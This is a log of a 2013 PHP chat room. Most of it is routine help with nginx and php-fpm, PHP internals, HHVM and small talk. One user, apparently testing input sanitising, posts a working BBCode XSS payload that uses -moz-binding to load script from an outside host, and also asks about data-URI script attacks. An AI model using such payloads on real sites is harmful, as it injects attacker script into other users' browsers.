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13:00
Does it matter?
Yes it does
htmlspecialchars() doesn't escape all characters htmlentities() does
Look at the string both functions output. It does matter
Usually, there's no need for htmlentities()
@NikiC show show
13:01
htmlent encodes all characters for which there is an html entity. So unless you have a really good argument to use it... I would suggest to not use it
Any ideas why my nginx virtual host (http://pastie.org/private/jsyezcs6ed1iididxqjv3q) config on nginx restart is causing the error:
*Restarting nginx: nginx: [emerg] invalid number of arguments in "fastcgi_split_path_info" directive in /etc/nginx/sites-enabled/lamephp.com:41* ?
doesn't matter atm. What matters are security risks.
Aaaaand it's tiny
In order to be able to worry about security and how to mitigate certain attacks you would need a) knowledge about the attacks b) knowledge about how to mitigate it (knowing what function you are using and why and what the consequences are are part of this) @user2429266
I wonder why data-uri attacks don't work. Images render, JS fails. Thats why I ask if it is possible that eg Firefox takes care about JS Data-uris in img tags but maybe IE not?
13:08
@NikiC why you leave me hanging ?? it's so cruel man, so cruel ...
@user2429266 Have you tried ie?
ie has cooties, careful ...
Not yet..
@Joe sure it has.^^
@Fabien this works for me fastcgi_split_path_info ^(.+.php)(.*)$;
Which is strange now that I look at it :P
hehe
very strange ...
13:11
That line basically also matches xphp :P
@JoeWatkins I just made i_zval_ptr_dtor use TSRMLS_DC rather than TSRMLS_FETCH(). The whole engine passes tsrm_id through, I only had to adjust one other signature
^(.+\.php)(.*)$ but no matter, that'll work ... but would work for mysillyphp and mysilly.php I think ...
yeah :P
Stupid I only now notice it :P
@NikiC rly, no impact on anything, rly ?
Does anyone know a good online PHP codepad? Ideone.com is very slow. I really like 3v4l.org, but I don't need all versions.
13:12
@ComFreek eval.in
@PeeHaa Well nginx restarted fine with your setup. Though PHP is still not working
Ok. This one works: [color=#ff0000;-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")]XSS[/color]
@hek2mgl As I said, I don't need all versions :)
@Fabien you should not restart nginx to reload configuration ....
@Fabien Have you also restarted php-fpm?
13:14
@ComFreek Oh, sorry I didn't read you post to end
@PeeHaa Yeah
@PeeHaa Thanks!! That's a really fast site!
ps aux | grep php-fpm
yw :) @ComFreek
do you have php-fpm processes, or did it die ?
13:14
@JoeWatkins Oh I figured it wasn't running if it errors during restart
Yeah php-fm is running nginx too
yay I just screwed up my dependencies on my box! test repo's FTW!
pastebin nginx config and fpm config
is this the first time you setup, or you changed something ??
502 bad gateway now
13:16
fpm is not serving requests
first time setup.
Will pastie all.
@Fabien That sound like something wrong with php-fpm
@NikiC so PR then, any other one liners you can spot by any chance ?? one day I will get around to that native tls patch, I think I've worked out a way for the changes to be contained in TSRM, at least on unix and windows is Pierre's problem ...
@NikiC seems like i_zend_is_true and that sort of thing could benefit from the same modification, no ?
Morning Folks,

I have to continue the for loop based on some condition in if loop. I have if in for
Any easy way to copy to clipboard a big file? :)
through cli
13:23
@Fabien on Linux you should have a look at the xclip command
@hek2mgl Yeah I tried but i got this error "Error: Can't open display: (null)"
I think for both of the issues it is good if we slow down a bit and
try to fix more bugs instead of adding new ones.
That sounds sane. That and performance
@Fabien Then execute it like DISPLAY=:0 xclip ... meaning you inject the propper environment into the command
@Fabien Of course this isn't portable
@NikiC Read your blog and I like that posts! really. I really don't like that you told me "please leave the room"! you should have read the whole conversation before telling this.. It was impolite because I helped this guy/girl so much out
Error: Can't open display: :0
@NikiC I'm from Berlin as well
@Fabien is X running on the server? If not, then there is no clipboard
13:31
@Fabien how are you connected to server ?
SSH using MTPuTTy
right, you haven't got winscp installed then ?
Opera akzeptiert javascript: URIs
@Fabien And you expect that it will in your Windows Clipboard? (no chance)
iirc anything you highlight in putty is copied to clipboard ...
but don't use windows really ...
you want winscp, just download the file ...
13:33
@JoeWatkins Yeah, it's a big file to keep scrolling and highlighting. I am trying to sftp in to it to grab the file too.
@JoeWatkins here you go Virtual Host and nginx conf
tail -n 150 /var/log/nginx/error.log
show me php-fpm configuration too
    # Make site accessible from localhost
    server_name 54.229.47.2;
?
@PeeHaa Elastic IP from Ec2 instance
@JoeWatkins *
2013/09/14 13:15:31 [error] 7184#0: *1 connect() failed (111: Connection refused) while connecting to upstream, client: 46.65.125.174, server: 54.229.47.2, request: "GET / HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "54.229.47.2"*
remove that server_name directive and reload nginx configuration
(it should not be an ip at any rate, it is not necessary)
that'll probably be it ...
removed. (well commented out) and now it's 502 bad gateway
13:41
show me php-fpm.conf if you dunno where it is do
find / -name php-fpm.conf
probably find /etc -name php-fpm.conf will bring up a result quicker
tail -n 150  /var/log/php5-fpm.log
need pool config from include=/etc/php5/fpm/pool.d/*.conf
[14-Sep-2013 13:14:40] NOTICE: configuration file /etc/php5/fpm/php-fpm.conf test is successful
ok command out the path split directive too ... is there any particular reason you need that ?
did you modify fastcgi_params or use default ?
modified.
I wanted to do it from scratch so deleted default.
13:47
pastebin it
possibly missing something required ....
oh wait I may be getting confused, fastcgi_params, do you mean the one in the virtual_host?
If not it should be default
ok people I have cleaned up my mailbox and read internals. Time to get productive
check fastcgi_params for SCRIPT_FILENAME, SCRIPT_NAME .. at least ... if one of those is missing it's probably that
if they are somewhere then pastebin fastcgi_params ...
I have a niggling feeling that the default is missing something required for php ...
one of those ^^ I think ...
Ah no I haven't editted anything in the fastcgi_param
nginx is setup and forget, I set it up about 2 years ago ... haven't had to change it so it looks a bit foreign ...
SCRIPT_FILENAME I'm pretty sure is not defined in fastcgi_params
fgrep SCRIPT_FILENAME /etc/php-fpm/fastcgi_params
13:53
I have no /etc/php-fpm directory
try
SCRIPT_FILENAME /usr/share/nginx/html/$fastcgi_script_name;
in fastcgi_params
only use your docroot ...
Still 502. it keeps switching from 502 to not loading.
Had a lot less errors the first time I setup nginx. might terminate the machine and start again.
While I feel it should work, I am also 60% confident I dicked it up somehow.
14:28
well .. fak
looks like I am finally getting ill
Vitamin C works really well for me, unsure if it's psycho-somatic though as I can't find any solid evidence to support why.
@JoeWatkins i_zend_is_true uses TSRMLS_FETCH() only in one rather obscure edge case, so it wouldn't make any measurable difference there
@NikiC kk, is there a pr yet ?
@NikiC can't do it as simple patch, curiosity killing me, want to see how you done it ...
14:47
oops sorry, that patch is inverted
yes it is ...
but I see how you done it anyway ... I thought you literally meant one line ...
this kind of change can just be pushed right ?
@JoeWatkins sure
:D
great ...
a very noticeable improvement in pthreads ...
14:53
@JoeWatkins did you test it?
Hi @hek2mgl
@JoeWatkins
yes, obviously timers in scripts are not much affected but when you look at resources used, mucho bettero ...
easier on the cpu for sure ...
and it feels a bit quicker but that's subjective I guess ...
mysql image column showing excluded data ,I have taken data type as a BLOB
what does it mean
there is a ghost in the machine ...
@JoeWatkins please help
is image is there in that
or not
14:58
Man I love GITS. Awesome series and films.
i have taken data type blob .
@Fabien so you have discovered anime
@tereško About 15 years ago yeah. Can't say I watch as much as I used to since about 4 years ago but yeah.
yeah .. it's kinda hard to find good ones
@tereško Indeed. Especially if you've watched a silly amount of it. I feel like the classics aren't being made anymore.
15:03
this season there is at least the Shingeki no Kyojin
also, FYI, third season for GiTS is being made
@tereško Oooh, Shingeki no Kyojin looks good. That'll give me something to watch for the next few days.

Ah, I hadn't heard that, I stopped actively looking for anime a while ago. While I still follow certain mangas and do the odd google for "best anime of 'x' year" every now and then.
I'm kinda following the news but not really having the time to taste the product
Which genres do you typically follow?
basically, it just like with gaming
@tereško im getting blob column data as like excluded .what does it mean
in mysql
15:08
@Fabien emm ... cyberpunk and "weird shit"
please help
Stop spamming and read the room topic @dineshHaraveer @shankar
wow ... almost 500 rep, but no manners
Ohai all
@SweetieBelle hola
15:13
Hey @SweetieBelle
@NikiC what does stackoverflow.com/q/18803023/508666 do in regards to prepared statement instead of disabling prepared statements. Is it mysql version dependent? something else?
don't know
hmmmm where is that @ircmaxell guy when you need him :P
Miami
I know I know. Drinking in the sun
15:21
What's up with the naming of php packages, php/php5 ?
is packages the right word for you you install on a server?
What packagemanager / repo are you using?
apt-get
I severly lack in terminology when it comes to my development. I guess that's the huge problem with 'try' style learning
I also do try style learning. Or rather try-and-fail try-and-faceplant learning
heh
But I don't know how aptitude comes up with those naming conventions
:)
15:30
stick a 5 in front of it, that'll confuse 'em.
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From the actual HHVM website:
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From the results, in addition to bugs, the HHVM team now knows that it is lacking in support for:
Unimplemented functions such as str_getcsv, stream_context_options
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(Hint: there's no such thing as a stream_context_options() function ...)
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I assume they mean you can't use any sort of stream context option functionality at this time?
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If so, this is a major shortcoming for my work.
15:36
@rdlowrey No idea, but the fact they keep improving it is pretty awesome :)
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@PeeHaa Yeah it's cool. I'm in "wait and see holding pattern" with HHVM at this point. I assume eventually it'll just run all my code without problems. I see little-to-no value in early adopting on this front, though; too much hassle.
PHP language improvements (e.g., type hints for scalars)
@rdlowrey That what I am waiting for to actually start spending time on it.
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@PeeHaa Yep. I think if we play hard to get she'll come to us :)
:P
We know there is work to do, but the HHVM team’s #1 priority right now is being able to run all the (sane) PHP code in the wild.
I will just fiddle with what works for now and once she is ready I will do her :D
If they can actually deliver that would be totally awesome
How much time does SO flair takes to update ?
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15:42
Yeah it would be. I love all the asinine comments on that article though. Things like ...
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I honestly fail to see the whole idea of keep trying to make PHP fast. It’s not used in enterprise projects, nor was it intended to be. I have nothing but respect for building (or almost) a blazing fast VM. PHP got so popular because of it’s ease of installation. Take that away and there’s nothing left. Having said that, I do hope that this project actually goes somewhere.
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^^ there are so many people in the world who don't realize PHP5.5 !== PHP4
I need to stop copy pasting so many server tutorials and actually understand what it is I am installing :-
Ignorant trolls are ignorant
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15:44
Because facebook is clearly not an "enterprise" project.
@Fabien @hamza had luck with my complete step-by-step tutorial. It's for centos though so it means switching distros :P
@Fabien :D
@NullPoiиteя No idea
@PeeHaa I don't mind switching distros. I only pick Ubuntu because it's higher on the EC2 AMI list :p
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My experiences with anything PHP related on CentOS have always been pleasant.
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15:45
PHP + CentOS = <3
that ^. If you want to switch distros and reinstall everything I can send you the tutorial @Fabien
Yes please @PeeHaa
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And remi-repo FTW. That makes it even easier.
@rdlowrey Yeah untill you are fucking stupid and start mixing it with the highly unstable remi-test repo like I did :P
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@PeeHaa lol yeah that'll do it.
15:46
:-)
@Fabien what's your mail?
I don't understand why anyone other than facebook would look at hiphop like it can solve problems ... @rdlowrey, you are mental :D
@PeeHaa pnari@yyou.co.uk <-- tempmail one as I wouldn't want my email permanently posted on the chat :D
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@JoeWatkins I didn't say I wanted to use it. It's totally unnecessary unless you're a facebook-scale business. But if they get to the point where it runs all my code then faster is a win.
@Fabien yeah I should really put the thing on my website again so I don't have to keep sharing it over mail :P
heh
user895378
15:49
@JoeWatkins I was mainly just pointing out that they listed a function that clearly doesn't even exist as something lacking current support. "No duh, because that function doesn't exist."
You've got mail. (It also includes setting up mail and server hardening in general which you may want to skip if you are simply looking to setup php-fpm and nginx) @Fabien
Cheers @PeeHaa
@rdlowrey fury muff ...
@JoeWatkins Ah yes! finally someone else used that experession :)
Good ol' Brits.
15:54
Great Stuff !, i think wordpress is the most important cms/framework for php and it’s have very large community from different language , please lets us know more about unit tests even we can make especial one for hhvm
Looks like there is also no postgres support btw :(
How strict are we here with the off topic chat rule? :)
Depends on my (or other room owners) mood :)
heh. Do you like Martial Art films?
Depends which ones
Jacky Chans
15:59
Depends which ones :)
heh. Watching Twin Dragons atm
That one was pretty meh at best :)
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Q: PHP Sending Mail Using SMTP

Jinu J DI have a server with mail support , say example.com.I configured the server and added MX records via cpanel,so that I can receive and send mails via. outlook.com with address myaddr@example.com.The MX records are got from domains.live.com. Now I need to send mail programatically using PHP using S...

Classic though...
@JinuJD ereg* has been deprecated a decade ago
16:04
:(
I got that from a tutorial :d
:D
@JinuJD Well yeah about that... don't just copy/paste code you found somewhere in the intarnet without having a clue as to what it does
That's how diseases spread
no I have modified it for my on purpose.I know what the code d
o
16:10
What does this do eregi_replace("[\]",'',$body);?
regular expression
He's technically right, you know.
is that enough dear?
16:11
No he is not
@PeeHaa It should throw some E_DEPRECATED…
@PeeHaa It appears to strip slashes, but wouldn't work right due to escaping?
That's like me pointing to a vehicle and asking what does it do and my little brother of 4 saying that's a car
I actually meant [\"]
to replace all "
:D
i should have used preg_replace
dear
@JoeWatkins another place that might be optimized is the TSRMLS_FETCH for emalloc/efree/erealloc. Though that's probably not that simple
16:13
@JinuJD No, you should've used str_replace.
Not being simple is not an excuse. You still have some part of today and a sunday to make it happen @NikiC
:-)
@DanLugg of course :)
and can anybody solve the issue
i dont need explanation regarding regex... :D
@NikiC can't you just manipulate the macro to check if tsrmls is set and if yes pass TSRMLS_CC else pass a TSRMLS_FETCH?
don't know if you can check with C if a variable is defined… mh, don't think so?
@JinuJD Well, no offense, but it appears you might.
anyone in here familiar with elixir's* pipe operator or clojure's threading macros?
16:20
:)
16:36
Which CentOS version do you guys go with?
I'm currently on "CentOS release 6.4 (Final)"
Cheers, vagranting.
Hmm. So, it seems the cheapest way to iterate an array in reverse, without copying the (entire) array at any point, is to iterate array_reverse(array_keys($array)) instead, and dereference the values in that order.
Just ^ because it was driving me batty trying to play with array pointers and COW.
@bwoebi hehe. if that were possible we would have done it long ago ;)
@PeeHaa pff
16:49
@PeeHaa I just read stackoverflow.com/questions/18803860/… again, and ... wtf.
Yeah OP really has a hard time finding the correct keywords to throw in a question
I love it when non-tech bosses do that.
My old boss "Does facebook use comments?"
@NikiC why doesn't C allow this? :-/
I was reading specs for an ad campaign my company was doing; they outsource to an agency to manage all of their asset distribution. I did the creative (I'm a soulless Flash monkey when necessary) and sent it off for the 5 mile run around departments for approvals and stuff. Anyway, I kept getting CC'd on everything about it, from the agency, internally, etc. They wouldn't stop referring it to a "pixel placement"
I was like PFFFRRDDDDDDDD STAHHHP CALLING IT THINGS THAT DONT MAKE SENSE!
16:56
@NikiC I always thought C wouldn't lack as many necessary language features as PHP :o
lol
I Googled the term just to be certain; it's nothing more than made-up pseudo-techno-babble jargon just so the agency feels like they have bigger penises.
Even worse when you try to explain it to them and they nod along like 'yup, yup... yup.'. It's so obvious they don't understand and think it's not beneficial for them to.
I hate techno-babble with a passion. In all aspects of communication.
Kind of reminds me of why this exists Explain it like I am 5

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